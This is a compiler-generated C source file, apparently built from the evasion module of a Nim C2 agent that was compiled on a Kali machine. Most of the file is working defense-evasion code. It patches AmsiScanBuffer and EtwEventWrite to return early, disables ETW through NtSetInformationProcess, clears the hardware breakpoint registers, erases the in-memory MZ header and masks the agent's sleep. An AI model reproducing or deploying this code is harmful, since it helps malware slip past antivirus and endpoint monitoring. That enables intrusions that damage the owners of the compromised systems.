/* Generated by Nim Compiler v2.2.10 */
/* Compiled for: Windows, amd64, gcc */
/* Command for C compiler:
   x86_64-w64-mingw32-gcc -c -w -fmax-errors=3 -mno-ms-bitfields -fno-strict-aliasing -DWIN32_LEAN_AND_MEAN -Os -fno-ident   -I/home/kali/.choosenim/toolchains/nim-2.2.10/lib -I/home/kali/c2/agents/agent-nim -o /home/kali/c2/agents/agent-nim/nimcache_nim5/@mevasion.nim.c.o /home/kali/c2/agents/agent-nim/nimcache_nim5/@mevasion.nim.c */
#define NIM_INTBITS 64

#include "nimbase.h"
#include <string.h>
#undef LANGUAGE_C
#undef MIPSEB
#undef MIPSEL
#undef PPC
#undef R3000
#undef R4000
#undef i386
#undef linux
#undef mips
#undef near
#undef far
#undef powerpc
#undef unix
typedef struct NimStrPayload NimStrPayload;
typedef struct NimStringV2 NimStringV2;
typedef struct tyObject_CONTEXT__AO9cR5Td9akRf5DRsUnRVZ9bQ tyObject_CONTEXT__AO9cR5Td9akRf5DRsUnRVZ9bQ;
typedef union tyObject_CONTEXT_UNION1__sDDDvRrKdFMoBZs9cjnbXyQ tyObject_CONTEXT_UNION1__sDDDvRrKdFMoBZs9cjnbXyQ;
typedef struct tyObject_XMM_SAVE_AREA32__oEssrP400Qxje318BZdLMA tyObject_XMM_SAVE_AREA32__oEssrP400Qxje318BZdLMA;
typedef struct tyObject_M128A__RHZ9afo9bRNZkrTJbQvWyXgA tyObject_M128A__RHZ9afo9bRNZkrTJbQvWyXgA;
typedef struct tyObject_CONTEXT_UNION1_STRUCT1__3XHy48XP169bLZS9bZcpMScg tyObject_CONTEXT_UNION1_STRUCT1__3XHy48XP169bLZS9bZcpMScg;
typedef N_STDCALL_PTR(NI, tyProc__E5YB9csXgVe1kveJGRzh5OQ) (NIM_CHAR* lpLibFileName_p0);
struct NimStrPayload {
	NI cap;
	NIM_CHAR data[SEQ_DECL_SIZE];
};
struct NimStringV2 {
	NI len;
	NimStrPayload* p;
};
typedef N_STDCALL_PTR(void*, tyProc__0jr8jiP1mbzQ6RKBrEEqrw) (NI hModule_p0, NIM_CHAR* lpProcName_p1);
typedef N_STDCALL_PTR(NI32, tyProc__p7k7hzRLl9cL8zqB8iUhO9cA) (void* lpAddress_p0, NI64 dwSize_p1, NI32 flNewProtect_p2, NI32* lpflOldProtect_p3);
typedef NU8 tyArray__MH3Xl37Mgf0SKCrLn4Ztzg[3];
typedef N_STDCALL_PTR(NI32, tyProc__fMigNdXgmTLA3kMzSYCkdA) (NI h_p0, NI32 cls_p1, void* info_p2, NI32 sz_p3);
typedef N_STDCALL_PTR(NI, tyProc__OsjIMZiv5zpV9a3Ct7Sk2Uw) (NI32 dwDesiredAccess_p0, NI32 bInheritHandle_p1, NI32 dwThreadId_p2);
typedef N_STDCALL_PTR(NI32, tyProc__9bXer9a4ps9aSGctILcxWReVw) (void);
struct tyObject_M128A__RHZ9afo9bRNZkrTJbQvWyXgA {
	NI64 Low;
	NI64 High;
};
typedef tyObject_M128A__RHZ9afo9bRNZkrTJbQvWyXgA tyArray__AL8qZYRuPJ8eZmqhCg9b4sQ[8];
typedef tyObject_M128A__RHZ9afo9bRNZkrTJbQvWyXgA tyArray__sK0eBEUCS4wusj3GAQdzlw[16];
typedef NU8 tyArray__2Bga2SYjOUAymepfwX0p1g[96];
struct tyObject_XMM_SAVE_AREA32__oEssrP400Qxje318BZdLMA {
	NU16 ControlWord;
	NU16 StatusWord;
	NU8 TagWord;
	NU8 Reserved1;
	NU16 ErrorOpcode;
	NI32 ErrorOffset;
	NU16 ErrorSelector;
	NU16 Reserved2;
	NI32 DataOffset;
	NU16 DataSelector;
	NU16 Reserved3;
	NI32 MxCsr;
	NI32 MxCsr_Mask;
	tyArray__AL8qZYRuPJ8eZmqhCg9b4sQ FloatRegisters;
	tyArray__sK0eBEUCS4wusj3GAQdzlw XmmRegisters;
	tyArray__2Bga2SYjOUAymepfwX0p1g Reserved4;
};
typedef tyObject_M128A__RHZ9afo9bRNZkrTJbQvWyXgA tyArray__WBwTrC8uLrL7QSrVfGzbTw[2];
struct tyObject_CONTEXT_UNION1_STRUCT1__3XHy48XP169bLZS9bZcpMScg {
	tyArray__WBwTrC8uLrL7QSrVfGzbTw Header;
	tyArray__AL8qZYRuPJ8eZmqhCg9b4sQ Legacy;
	tyObject_M128A__RHZ9afo9bRNZkrTJbQvWyXgA Xmm0;
	tyObject_M128A__RHZ9afo9bRNZkrTJbQvWyXgA Xmm1;
	tyObject_M128A__RHZ9afo9bRNZkrTJbQvWyXgA Xmm2;
	tyObject_M128A__RHZ9afo9bRNZkrTJbQvWyXgA Xmm3;
	tyObject_M128A__RHZ9afo9bRNZkrTJbQvWyXgA Xmm4;
	tyObject_M128A__RHZ9afo9bRNZkrTJbQvWyXgA Xmm5;
	tyObject_M128A__RHZ9afo9bRNZkrTJbQvWyXgA Xmm6;
	tyObject_M128A__RHZ9afo9bRNZkrTJbQvWyXgA Xmm7;
	tyObject_M128A__RHZ9afo9bRNZkrTJbQvWyXgA Xmm8;
	tyObject_M128A__RHZ9afo9bRNZkrTJbQvWyXgA Xmm9;
	tyObject_M128A__RHZ9afo9bRNZkrTJbQvWyXgA Xmm10;
	tyObject_M128A__RHZ9afo9bRNZkrTJbQvWyXgA Xmm11;
	tyObject_M128A__RHZ9afo9bRNZkrTJbQvWyXgA Xmm12;
	tyObject_M128A__RHZ9afo9bRNZkrTJbQvWyXgA Xmm13;
	tyObject_M128A__RHZ9afo9bRNZkrTJbQvWyXgA Xmm14;
	tyObject_M128A__RHZ9afo9bRNZkrTJbQvWyXgA Xmm15;
};
union tyObject_CONTEXT_UNION1__sDDDvRrKdFMoBZs9cjnbXyQ {
	tyObject_XMM_SAVE_AREA32__oEssrP400Qxje318BZdLMA FltSave;
	tyObject_XMM_SAVE_AREA32__oEssrP400Qxje318BZdLMA FloatSave;
	tyObject_CONTEXT_UNION1_STRUCT1__3XHy48XP169bLZS9bZcpMScg struct1;
};
typedef tyObject_M128A__RHZ9afo9bRNZkrTJbQvWyXgA tyArray__xl9aGfAAEgVz5n6u0kU6tzw[26];
struct tyObject_CONTEXT__AO9cR5Td9akRf5DRsUnRVZ9bQ {
	NI64 P1Home;
	NI64 P2Home;
	NI64 P3Home;
	NI64 P4Home;
	NI64 P5Home;
	NI64 P6Home;
	NI32 ContextFlags;
	NI32 MxCsr;
	NU16 SegCs;
	NU16 SegDs;
	NU16 SegEs;
	NU16 SegFs;
	NU16 SegGs;
	NU16 SegSs;
	NI32 EFlags;
	NI64 Dr0;
	NI64 Dr1;
	NI64 Dr2;
	NI64 Dr3;
	NI64 Dr6;
	NI64 Dr7;
	NI64 Rax;
	NI64 Rcx;
	NI64 Rdx;
	NI64 Rbx;
	NI64 Rsp;
	NI64 Rbp;
	NI64 Rsi;
	NI64 Rdi;
	NI64 R8;
	NI64 R9;
	NI64 R10;
	NI64 R11;
	NI64 R12;
	NI64 R13;
	NI64 R14;
	NI64 R15;
	NI64 Rip;
	tyObject_CONTEXT_UNION1__sDDDvRrKdFMoBZs9cjnbXyQ union1;
	tyArray__xl9aGfAAEgVz5n6u0kU6tzw VectorRegister;
	NI64 VectorControl;
	NI64 DebugControl;
	NI64 LastBranchToRip;
	NI64 LastBranchFromRip;
	NI64 LastExceptionToRip;
	NI64 LastExceptionFromRip;
};
typedef N_STDCALL_PTR(NI32, tyProc__eZgqZhdYuVCCVQF1DhAEtQ) (NI hThread_p0, tyObject_CONTEXT__AO9cR5Td9akRf5DRsUnRVZ9bQ* lpContext_p1);
typedef N_STDCALL_PTR(NI32, tyProc__P13srMBg9b3d3yEV9aW4NCoA) (NI hObject_p0);
typedef N_STDCALL_PTR(NI, tyProc__pN2IxdqFq5YYriwp9cFXkPA) (NU16* lpModuleName_p0);
typedef N_STDCALL_PTR(NI, tyProc__uryidYWkntM7ddjZSyxvyQ) (void);
typedef N_STDCALL_PTR(NI64, tyProc__pdvM9cE5kOE4yT8D0B1TnYQ) (NI hHeap_p0, NI32 dwFlags_p1, void* lpMem_p2);
typedef N_STDCALL_PTR(void*, tyProc__bREaOok5B7e9c9crOwTPdBhg) (void* lpAddress_p0, NI64 dwSize_p1, NI32 flAllocationType_p2, NI32 flProtect_p3);
typedef N_STDCALL_PTR(NI32, tyProc__qzER9a83At0GuyLU6E9cw7Lw) (void* lpAddress_p0, NI64 dwSize_p1, NI32 dwFreeType_p2);
N_LIB_PRIVATE N_NIMCALL(void, patchAMSI__evasion_u19)(void);
N_LIB_PRIVATE N_NIMCALL(NIM_CHAR*, winstrConverterStringToPtrChar__pkgZwinimZwinstr_u795)(NimStringV2 x_p0);
N_LIB_PRIVATE N_NIMCALL(void, patchBytes__evasion_u6)(void* address_p0, NU8* patch_p1, NI patch_p1Len_0);
static N_INLINE(void, copyMem__system_u1755)(void* dest_p0, void* source_p1, NI size_p2);
static N_INLINE(void, nimCopyMem)(void* dest_p0, void* source_p1, NI size_p2);
static N_INLINE(NIM_BOOL*, nimErrorFlag)(void);
N_LIB_PRIVATE N_NIMCALL(void, patchETW__evasion_u41)(void);
N_LIB_PRIVATE N_NIMCALL(void, disableETWProcess__evasion_u44)(void);
N_LIB_PRIVATE N_NIMCALL(void, clearHWBP__evasion_u81)(void);
static N_INLINE(void, nimZeroMem)(void* p_p0, NI size_p1);
static N_INLINE(void, nimSetMem__system_u2188)(void* a_p0, int v_p1, NI size_p2);
N_LIB_PRIVATE N_NIMCALL(void, wipeMZHeader__evasion_u78)(void);
N_LIB_PRIVATE N_NIMCALL(void, initSleepKey__evasion_u149)(void);
N_LIB_PRIVATE N_NIMCALL(void, randomize__pureZrandom_u377)(void);
N_LIB_PRIVATE N_NIMCALL(NI, rand__pureZrandom_u143)(NI max_p0);
N_LIB_PRIVATE N_NIMCALL(void, nossleep)(NI milsecs_p0);
static const struct {
  NI cap; NIM_CHAR data[8+1];
} TM__wo7ubYKOtOcqtfxQiyH9akw_2 = { 8 | NIM_STRLIT_FLAG, "amsi.dll" };
static const NimStringV2 TM__wo7ubYKOtOcqtfxQiyH9akw_3 = {8, (NimStrPayload*)&TM__wo7ubYKOtOcqtfxQiyH9akw_2};
static const struct {
  NI cap; NIM_CHAR data[14+1];
} TM__wo7ubYKOtOcqtfxQiyH9akw_4 = { 14 | NIM_STRLIT_FLAG, "AmsiScanBuffer" };
static const NimStringV2 TM__wo7ubYKOtOcqtfxQiyH9akw_5 = {14, (NimStrPayload*)&TM__wo7ubYKOtOcqtfxQiyH9akw_4};
static const struct {
  NI cap; NIM_CHAR data[9+1];
} TM__wo7ubYKOtOcqtfxQiyH9akw_7 = { 9 | NIM_STRLIT_FLAG, "ntdll.dll" };
static const NimStringV2 TM__wo7ubYKOtOcqtfxQiyH9akw_8 = {9, (NimStrPayload*)&TM__wo7ubYKOtOcqtfxQiyH9akw_7};
static const struct {
  NI cap; NIM_CHAR data[13+1];
} TM__wo7ubYKOtOcqtfxQiyH9akw_9 = { 13 | NIM_STRLIT_FLAG, "EtwEventWrite" };
static const NimStringV2 TM__wo7ubYKOtOcqtfxQiyH9akw_10 = {13, (NimStrPayload*)&TM__wo7ubYKOtOcqtfxQiyH9akw_9};
static const NimStringV2 TM__wo7ubYKOtOcqtfxQiyH9akw_11 = {9, (NimStrPayload*)&TM__wo7ubYKOtOcqtfxQiyH9akw_7};
static const struct {
  NI cap; NIM_CHAR data[23+1];
} TM__wo7ubYKOtOcqtfxQiyH9akw_12 = { 23 | NIM_STRLIT_FLAG, "NtSetInformationProcess" };
static const NimStringV2 TM__wo7ubYKOtOcqtfxQiyH9akw_13 = {23, (NimStrPayload*)&TM__wo7ubYKOtOcqtfxQiyH9akw_12};
static NIM_CONST tyArray__MH3Xl37Mgf0SKCrLn4Ztzg TM__wo7ubYKOtOcqtfxQiyH9akw_6 = {((NU8)51),
((NU8)192),
((NU8)195)}
;
N_LIB_PRIVATE NU64 xorSleepKey__evasion_u148 = 0ULL;
extern tyProc__E5YB9csXgVe1kveJGRzh5OQ Dl_2013270634_;
extern tyProc__0jr8jiP1mbzQ6RKBrEEqrw Dl_2013268496_;
extern tyProc__p7k7hzRLl9cL8zqB8iUhO9cA Dl_2013268535_;
extern NIM_THREADVAR NIM_BOOL nimInErrorMode__system_u4172;
extern tyProc__E5YB9csXgVe1kveJGRzh5OQ Dl_2013268394_;
extern tyProc__OsjIMZiv5zpV9a3Ct7Sk2Uw Dl_2013268826_;
extern tyProc__9bXer9a4ps9aSGctILcxWReVw Dl_2013268982_;
extern tyProc__eZgqZhdYuVCCVQF1DhAEtQ Dl_2013268881_;
extern tyProc__P13srMBg9b3d3yEV9aW4NCoA Dl_2013268233_;
extern tyProc__eZgqZhdYuVCCVQF1DhAEtQ Dl_2013268884_;
extern tyProc__pN2IxdqFq5YYriwp9cFXkPA Dl_2013268396_;
extern tyProc__uryidYWkntM7ddjZSyxvyQ Dl_2013268305_;
extern tyProc__pdvM9cE5kOE4yT8D0B1TnYQ Dl_2013268301_;
extern tyProc__bREaOok5B7e9c9crOwTPdBhg Dl_2013268526_;
extern tyProc__qzER9a83At0GuyLU6E9cw7Lw Dl_2013268531_;
static N_INLINE(void, nimCopyMem)(void* dest_p0, void* source_p1, NI size_p2) {
	void* T1_;
	T1_ = (void*)0;
	T1_ = memcpy(dest_p0, source_p1, ((size_t) (size_p2)));
}
static N_INLINE(void, copyMem__system_u1755)(void* dest_p0, void* source_p1, NI size_p2) {
	nimCopyMem(dest_p0, source_p1, size_p2);
}
N_LIB_PRIVATE N_NIMCALL(void, patchBytes__evasion_u6)(void* address_p0, NU8* patch_p1, NI patch_p1Len_0) {
	NI32 oldProt_1;
	NI32 T1_;
	NI32 T2_;
	oldProt_1 = (NI32)0;
	T1_ = (NI32)0;
	T1_ = Dl_2013268535_(address_p0, ((NI64) (patch_p1Len_0)), ((NI32)64), (&oldProt_1));
	(void)(T1_);
	copyMem__system_u1755(address_p0, ((void*) ((&patch_p1[((NI)0)]))), (patch_p1Len_0));
	T2_ = (NI32)0;
	T2_ = Dl_2013268535_(address_p0, ((NI64) (patch_p1Len_0)), oldProt_1, (&oldProt_1));
	(void)(T2_);
}
static N_INLINE(NIM_BOOL*, nimErrorFlag)(void) {
	NIM_BOOL* result;
	result = (&nimInErrorMode__system_u4172);
	return result;
}
N_LIB_PRIVATE N_NIMCALL(void, patchAMSI__evasion_u19)(void) {
	NI amsi_1;
	NIM_CHAR* T1_;
	void* fn_1;
	NIM_CHAR* T6_;
NIM_BOOL* nimErr_;
{nimErr_ = nimErrorFlag();
	T1_ = (NIM_CHAR*)0;
	T1_ = winstrConverterStringToPtrChar__pkgZwinimZwinstr_u795(TM__wo7ubYKOtOcqtfxQiyH9akw_3);
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	amsi_1 = Dl_2013270634_(T1_);
	{
		if (!(amsi_1 == ((NI)0))) goto LA4_;
		goto BeforeRet_;
	}
LA4_: ;
	T6_ = (NIM_CHAR*)0;
	T6_ = winstrConverterStringToPtrChar__pkgZwinimZwinstr_u795(TM__wo7ubYKOtOcqtfxQiyH9akw_5);
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	fn_1 = Dl_2013268496_(amsi_1, T6_);
	{
		if (!(fn_1 == NIM_NIL)) goto LA9_;
		goto BeforeRet_;
	}
LA9_: ;
	patchBytes__evasion_u6(fn_1, TM__wo7ubYKOtOcqtfxQiyH9akw_6, 3);
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	}BeforeRet_: ;
}
N_LIB_PRIVATE N_NIMCALL(void, patchETW__evasion_u41)(void) {
	NI ntdll_1;
	NIM_CHAR* T1_;
	void* fn_1;
	NIM_CHAR* T6_;
NIM_BOOL* nimErr_;
{nimErr_ = nimErrorFlag();
	T1_ = (NIM_CHAR*)0;
	T1_ = winstrConverterStringToPtrChar__pkgZwinimZwinstr_u795(TM__wo7ubYKOtOcqtfxQiyH9akw_8);
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	ntdll_1 = Dl_2013268394_(T1_);
	{
		if (!(ntdll_1 == ((NI)0))) goto LA4_;
		goto BeforeRet_;
	}
LA4_: ;
	T6_ = (NIM_CHAR*)0;
	T6_ = winstrConverterStringToPtrChar__pkgZwinimZwinstr_u795(TM__wo7ubYKOtOcqtfxQiyH9akw_10);
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	fn_1 = Dl_2013268496_(ntdll_1, T6_);
	{
		if (!(fn_1 == NIM_NIL)) goto LA9_;
		goto BeforeRet_;
	}
LA9_: ;
	patchBytes__evasion_u6(fn_1, TM__wo7ubYKOtOcqtfxQiyH9akw_6, 3);
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	}BeforeRet_: ;
}
N_LIB_PRIVATE N_NIMCALL(void, disableETWProcess__evasion_u44)(void) {
	NI ntdll_1;
	NIM_CHAR* T1_;
	tyProc__fMigNdXgmTLA3kMzSYCkdA fn_1;
	NIM_CHAR* T6_;
	void* T7_;
	NI32 flag_1;
	NI32 T12_;
NIM_BOOL* nimErr_;
{nimErr_ = nimErrorFlag();
	T1_ = (NIM_CHAR*)0;
	T1_ = winstrConverterStringToPtrChar__pkgZwinimZwinstr_u795(TM__wo7ubYKOtOcqtfxQiyH9akw_11);
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	ntdll_1 = Dl_2013268394_(T1_);
	{
		if (!(ntdll_1 == ((NI)0))) goto LA4_;
		goto BeforeRet_;
	}
LA4_: ;
	T6_ = (NIM_CHAR*)0;
	T6_ = winstrConverterStringToPtrChar__pkgZwinimZwinstr_u795(TM__wo7ubYKOtOcqtfxQiyH9akw_13);
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	T7_ = (void*)0;
	T7_ = Dl_2013268496_(ntdll_1, T6_);
	fn_1 = ((tyProc__fMigNdXgmTLA3kMzSYCkdA) (T7_));
	{
		if (!(fn_1 == NIM_NIL)) goto LA10_;
		goto BeforeRet_;
	}
LA10_: ;
	flag_1 = ((NI32)0);
	T12_ = (NI32)0;
	T12_ = fn_1(((NI)-1), ((NI32)87), ((void*) ((&flag_1))), ((NI32)4));
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	(void)(T12_);
	}BeforeRet_: ;
}
static N_INLINE(void, nimSetMem__system_u2188)(void* a_p0, int v_p1, NI size_p2) {
	void* T1_;
	T1_ = (void*)0;
	T1_ = memset(a_p0, v_p1, ((size_t) (size_p2)));
}
static N_INLINE(void, nimZeroMem)(void* p_p0, NI size_p1) {
	nimSetMem__system_u2188(p_p0, ((int)0), size_p1);
}
N_LIB_PRIVATE N_NIMCALL(void, clearHWBP__evasion_u81)(void) {
	NI h_1;
	NI32 T1_;
	tyObject_CONTEXT__AO9cR5Td9akRf5DRsUnRVZ9bQ ctx_1;
	NI32 T13_;
NIM_BOOL* nimErr_;
{nimErr_ = nimErrorFlag();
	T1_ = (NI32)0;
	T1_ = Dl_2013268982_();
	h_1 = Dl_2013268826_(((NI32)24), ((NI32)0), T1_);
	{
		if (!(h_1 == ((NI)0))) goto LA4_;
		goto BeforeRet_;
	}
LA4_: ;
	nimZeroMem((void*)(&ctx_1), sizeof(tyObject_CONTEXT__AO9cR5Td9akRf5DRsUnRVZ9bQ));
	ctx_1.ContextFlags = ((NI32)1048592);
	{
		NI32 T9_;
		NI32 T12_;
		T9_ = (NI32)0;
		T9_ = Dl_2013268881_(h_1, (&ctx_1));
		if (!(T9_ == ((NI32)0))) goto LA10_;
		T12_ = (NI32)0;
		T12_ = Dl_2013268233_(h_1);
		(void)(T12_);
		goto BeforeRet_;
	}
LA10_: ;
	ctx_1.Dr0 = IL64(0);
	ctx_1.Dr1 = IL64(0);
	ctx_1.Dr2 = IL64(0);
	ctx_1.Dr3 = IL64(0);
	ctx_1.Dr6 = IL64(0);
	ctx_1.Dr7 = IL64(0);
	T13_ = (NI32)0;
	T13_ = Dl_2013268884_(h_1, (&ctx_1));
	(void)(T13_);
	{
		LA6_:;
	}
	{
		NI32 T16_;
		T16_ = (NI32)0;
		T16_ = Dl_2013268233_(h_1);
		(void)(T16_);
	}
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	}BeforeRet_: ;
}
N_LIB_PRIVATE N_NIMCALL(void, wipeMZHeader__evasion_u78)(void) {
	NI base_1;
	NI32 old_1;
	NI32 T5_;
	NI32 T6_;
{	base_1 = Dl_2013268396_(((NU16*) NIM_NIL));
	{
		if (!(base_1 == ((NI)0))) goto LA3_;
		goto BeforeRet_;
	}
LA3_: ;
	old_1 = (NI32)0;
	T5_ = (NI32)0;
	T5_ = Dl_2013268535_(((void*) (base_1)), IL64(2), ((NI32)4), (&old_1));
	(void)(T5_);
	(*((NU8*) (base_1))) = ((NU8)0);
	(*((NU8*) ((NI)(base_1 + ((NI)1))))) = ((NU8)0);
	T6_ = (NI32)0;
	T6_ = Dl_2013268535_(((void*) (base_1)), IL64(2), old_1, (&old_1));
	(void)(T6_);
	}BeforeRet_: ;
}
N_LIB_PRIVATE N_NIMCALL(void, initSleepKey__evasion_u149)(void) {
	NI T1_;
NIM_BOOL* nimErr_;
{nimErr_ = nimErrorFlag();
	randomize__pureZrandom_u377();
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	T1_ = (NI)0;
	T1_ = rand__pureZrandom_u143(((NI)IL64(9223372036854775807)));
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	xorSleepKey__evasion_u148 = ((NU64) (T1_));
	}BeforeRet_: ;
}
N_LIB_PRIVATE N_NIMCALL(void, applyEvasion__evasion_u302)(void) {
NIM_BOOL* nimErr_;
{nimErr_ = nimErrorFlag();
	patchAMSI__evasion_u19();
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	patchETW__evasion_u41();
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	disableETWProcess__evasion_u44();
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	clearHWBP__evasion_u81();
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	wipeMZHeader__evasion_u78();
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	initSleepKey__evasion_u149();
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	}BeforeRet_: ;
}
N_LIB_PRIVATE N_NIMCALL(void, sleepMasked__evasion_u154)(NI ms_p0) {
	NI heap_1;
	NI64 size_1;
	NI64 dummySize_1;
	void* dummy_1;
NIM_BOOL* nimErr_;
{nimErr_ = nimErrorFlag();
	{
		if (!(ms_p0 <= ((NI)0))) goto LA3_;
		goto BeforeRet_;
	}
LA3_: ;
	heap_1 = Dl_2013268305_();
	size_1 = Dl_2013268301_(heap_1, ((NI32)0), ((void*) (heap_1)));
	dummySize_1 = IL64(4096);
	dummy_1 = Dl_2013268526_(NIM_NIL, dummySize_1, ((NI32)12288), ((NI32)4));
	{
		NI32 old_1;
		NI32 T9_;
		NI32 T10_;
		NI32 T11_;
		if (!!((dummy_1 == NIM_NIL))) goto LA7_;
		old_1 = (NI32)0;
		T9_ = (NI32)0;
		T9_ = Dl_2013268535_(dummy_1, dummySize_1, ((NI32)1), (&old_1));
		(void)(T9_);
		nossleep(ms_p0);
		if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
		T10_ = (NI32)0;
		T10_ = Dl_2013268535_(dummy_1, dummySize_1, ((NI32)4), (&old_1));
		(void)(T10_);
		T11_ = (NI32)0;
		T11_ = Dl_2013268531_(dummy_1, IL64(0), ((NI32)32768));
		(void)(T11_);
	}
	goto LA5_;
LA7_: ;
	{
		nossleep(ms_p0);
		if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	}
LA5_: ;
	}BeforeRet_: ;
}
